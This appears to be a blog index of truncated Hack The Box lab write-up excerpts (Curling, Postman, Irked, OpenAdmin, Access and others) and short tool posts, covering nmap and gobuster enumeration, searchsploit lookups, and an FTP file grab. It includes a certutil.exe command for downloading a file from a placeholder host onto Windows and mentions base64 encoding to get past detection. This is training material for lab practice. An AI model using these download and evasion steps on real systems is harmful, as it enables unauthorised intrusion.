HTB Curling

$ nmap -T4 -A -p-
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u -e
If we access to, we'll find a Joomla login form. Accessing to, based on the published post there are these users: Super User, Floris. Looking at the source code, there is a suspicious secret.txt file somewhere. This string seems to be encoded. Searching for «linux decode string», Google gives us the suggestion of

HTB Postman

$ nmap -A -p- -T4
Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
$ gobuster dir -u -w
Access to Access to Access to Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and

HTB Writeup

$ nmap -A -T4 -p- -sV
Although nmap says port 80 is open, it also appears as tcpwrapped. What does that mean? Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux. When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper. Specifically, it means that a full TCP handshake was completed,

HTB Irked

$ nmap -A -T4 -p-
Access to According to Nmap's results, we have these open ports related to UnrealIRCd:
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)
As we have an IRC server in this box, let's start by trying to connect to it.
$ sudo irssi 65534
According to this, we have an UnrealIRCd version
$ searchsploit unrealirc
Exploiting UnrealIRCd

HTB OpenAdmin

Enumeration
$ nmap -A -T4 -p-
$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e
Access to Access to There is a login link. Click it and you'll be redirected to Based on this screenshot, we have an OpenNetAdmin (v18.1.1). Access to Access to
Vulnerability analysis
$ searchsploit opennetadmin
$ searchsploit -x 47691
The -d option in curl means data. -d, --data: (HTTP MQTT) Sends the specified data in a POST

HTB Friendzone

$ sudo nmap -A -T4 -p-
$ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u
Access to Access to We discovered that the SSL cert is using a common name of (it is a vhost). So we can then access (after this host was added to the /etc/hosts file). We can do a zone transfer for that domain I saw earlier on the main page and get the

HTB Access

$ nmap -A -T4 -p-
Open ports detected:
• 21/tcp open ftp Microsoft ftpd
• 23/tcp open telnet?
• 80/tcp open http Microsoft IIS httpd 7.5
$ ftp
ftp> dir
ftp> cd Backups
ftp> dir
ftp> get backup.mdb
ftp> cd ..
ftp> dir
ftp> cd Engineer
ftp> dir
ftp> get «Access»
The files haven't been downloaded correctly. By default, the ftp transfer mode is set for text files. We need to download these files again, but this time using

Impacket installation

Impacket is a collection of Python classes for working with network protocols. Installation process: download the latest release, extract the file, install the requirements, install the package.
$ pip install -r requirements.txt
If we get an error installing the wheel package, we can install it individually.
$ pip install wheel
Now run the configuration script.
$ python bdist_wheel
Let's try to install the requirements again:
$ pip install -r requirements.txt

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command will download the «file» onto the Windows machine from «http://<ip>»:
certutil.exe -urlcache -split -f http://<ip>/file file
Depending on the file, it could be detected as malicious and then be blocked. A possible solution may be using the method described in this post from The trick is based on base64 encoding the file when sending the

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements.
Run the installation script:
$ python3 -m pip install git+
Add /home/ruben/.local/bin to your PATH.
Other requirements installation:
$ sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner